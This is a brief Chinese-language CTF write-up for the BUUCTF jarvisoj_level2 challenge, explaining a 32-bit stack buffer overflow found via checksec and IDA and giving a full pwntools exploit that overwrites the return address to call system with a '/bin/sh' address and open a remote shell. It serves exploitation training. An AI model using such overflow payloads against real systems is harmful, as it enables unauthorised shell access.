首先检查checksec
可以看见no canary found
说明可能是栈溢出
运行一下程序
随便输一个,得到hello world(感觉这一步好像没啥用,没有RE那用)
IDA 32 打开
后门
漏洞点
buf:
代码思路:利用溢出,把buf填满,然后构造程序,得到获取shell的目的
exp来自
BUUCTF—jarvisoj_level2 - 予柒 - 博客园 (cnblogs.com)
from pwn import*
r=remote('node5.buuoj.cn',27695)
shell_addr=0x804a024
system=0x8048320
payload=b'a'*(0x88+4)+p32(system)+p32(6)+p32(shell_addr)
r.sendline(payload)
r.interactive()
这里解释一下代码
payload就是溢出,然后p32 就是调用system,然后后面紧跟着就是p32(6),这个你随便填都行
因为32构造就是 地址+下一次返回地址+参数
只是格式需要
